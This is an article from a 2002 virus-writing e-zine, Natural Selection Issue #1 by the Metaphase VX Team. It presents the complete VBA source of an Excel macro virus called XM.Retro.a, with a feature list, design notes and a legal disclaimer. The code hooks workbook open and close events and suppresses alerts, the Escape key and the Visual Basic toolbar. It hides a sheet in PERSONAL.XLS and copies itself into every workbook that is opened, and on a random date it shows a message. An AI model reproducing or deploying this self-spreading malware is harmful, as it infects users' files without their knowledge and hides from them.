 -=( ---------------------------------------------------------------------- )=-
 -=( Natural Selection Issue #1 -------------------------------- XM.Retro.a )=-
 -=( ---------------------------------------------------------------------- )=-

 -=( 0 : XM.Retro.a Features ---------------------------------------------- )=-

 Imports:       None
 Infects:       Excel Documents
 Strategy:      Autohooking Document open and close, Resident
 Compatibility: Excel for Windows 5-7
 Saves Stamps:  None
 MultiThreaded: None
 Polymorphism:  None
 AntiAV / EPO:  Full Stealth
 SEH Abilities: None
 Payload:       Randomly by date shows a Message to the user.

 -=( 1 : XM.Retro.a Design Goals ------------------------------------------ )=-

 Since I had never written a straight XM for Excel 5-7 and I had been working
 on a disassembly of one, I figures it was about time I made one.

 I skipped ahead to Office 97, my mistake these are kinda fun.

 -=( 2 : XM.Retro.a Disclaimer -------------------------------------------- )=-

 THE CONTENTS OF  THIS ELECTRONIC MAGAZINE  AND ITS ASSOCIATED  SOURCE CODE ARE
 COVERED UNDER THE BELOW TERMS AND CONDITIONS.  IF YOU DO NOT AGREE TO BE BOUND
 BY THESE TERMS AND CONDITIONS, OR  ARE NOT LEGALLY ENTITLED TO AGREE  TO THEM,
 YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY.

 COPYRIGHT
 Copyright on  materials in  this  magazine  and  the  information  therein and
 their  arrangement is owned by METAPHASE VX TEAM   unless otherwise indicated.

 RIGHTS AND LIMITATIONS
 You have  the  right  to use,    copy and  distribute  the  material in   this
 magazine free   of  charge,  for  all   purposes  allowed  by your   governing
 laws.  You    are expressly  PROHIBITED   from   using the  material contained
 herein  for   any   purposes  that   would   cause    or would    help promote
 the illegal   use of the material.

 NO WARRANTY
 The  information   contained within   this  magazine  are  provided  "as  is".
 METAPHASE VX TEAM         do    not    warranty    the     accuracy, adequacy,
 or   completeness     of     given  information,  and    expressly   disclaims
 liability   for   errors   or   omissions    contained  therein.   No implied,
 express, or statutory  warranty, is given  in conjunction with  this magazine.

 LIMITATION OF LIABILITY
 In *NO* event will METAPHASE VX TEAM  or any of its MEMBERS be liable for  any
 damages  including  and  without  limitation,  direct  or  indirect,  special,
 incidental,  or  consequential  damages,   losses,  or  expenses  arising   in
 connection with this magazine, or the use thereof.

 ADDITIONAL DISCLAIMER
 Computer viruses will spread of their own accord between computer systems, and
 across international boundaries.  They are raw animals with no concern for the
 law, and for that reason your possession of them makes YOU responsible for the
 actions they carry out.

 The viruses provided in this magazine are for educational purposes ONLY.  They
 are NOT intended for use in  ANY WAY outside of strict, controlled  laboratory
 conditions.  If compiled and executed these viruses WILL land you in court(s).

 You will be held responsible for your actions.  As  source code these  viruses
 are  inert  and   covered   by   implied  freedom   of  speech   laws  in some
 countries.  In  binary form  these viruses  are malicious  weapons.  METAPHASE
 VX TEAM  do not condone the application of these viruses and will NOT be  held
 LIABLE for any MISUSE.

 -=( 3 : XM.Retro.A ------------------------------------------------------- )=-

Sub Auto_Open()
On Error Resume Next
Application.OnSheetActivate = "Retro"
End Sub

Sub Auto_Close()
On Error Resume Next
Application.OnSheetActivate = "Retro"
End Sub

Sub Retro
On Error Resume Next
Application.ScreenUpdating = False
Application.EnableCancelKey = xlDisabled
Application.DisplayAlerts = False
Application.Interactive = False
Application.OnKey "{ESCAPE}", ""
Application.OnKey "{BREAK}", ""
Toolbars("Visual Basic").Visible = False
VInstalled = 0
ASP$ = Application.StartupPath
Per$ = Dir(ASP$ & "\" & "PERSONAL.XLS")
ASPP$ = ASP$ & "\PERSONAL.XLS"
If ThisWorkbook.Name <> "PERSONAL.XLS" Then
 If Per$ = "PERSONAL.XLS" Then VInstalled = 1
  If VInstalled = 1 Then GoTo Payload
  Else
  Workbooks.Add.SaveAs Filename:=ASPP$
  Workbooks(ThisWorkbook.Name).Sheets("Retro").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
  Workbooks("PERSONAL.XLS").Sheets("Retro").Visible = False
  Workbooks("PERSONAL.XLS").Save
  Windows("PERSONAL.XLS").Visible = False
End If
 Else
 Windows("PERSONAL.XLS").Visible = False
 For X = 1 To Workbooks(ActiveWorkbook.Name).Sheets.Count
  If Workbooks(ActiveWorkbook.Name).Sheets(X).Name = "Retro" Then VInstalled = 1
  Next
   If VInstalled = 1 Then GoTo Payload
   Else
   Workbooks("PERSONAL.XLS").Sheets("Retro").Copy Before:=Workbooks(ActiveWorkbook.Name).Sheets(1)
   Workbooks(ActiveWorkbook.Name).Sheets("Retro").Visible = False
   Workbooks(ActiveWorkbook.Name).Save
   Windows("PERSONAL.XLS").Visible = False
  End If
End If
Workbooks("PERSONAL.XLS").Save
Payload:
TD = Int(Rnd() * 30) + 1
If Day(Now()) = TD Then
 TN$ = Application.UserName
 Application.Caption = "XM.Retro.a"
 MsgBox "Hello " & TN$ & " Welcome to XM.Retro.a" & Chr(10) & Chr(10) & "Back to the Old School", "XM.Retro.a"
End If
Application.ScreenUpdating = True
Application.DisplayAlerts = True
End Sub

 -=( ---------------------------------------------------------------------- )=-
 -=( Natural Selection Issue #1 ---------------- (c) 2002 Metaphase VX Team )=-
 -=( ---------------------------------------------------------------------- )=-
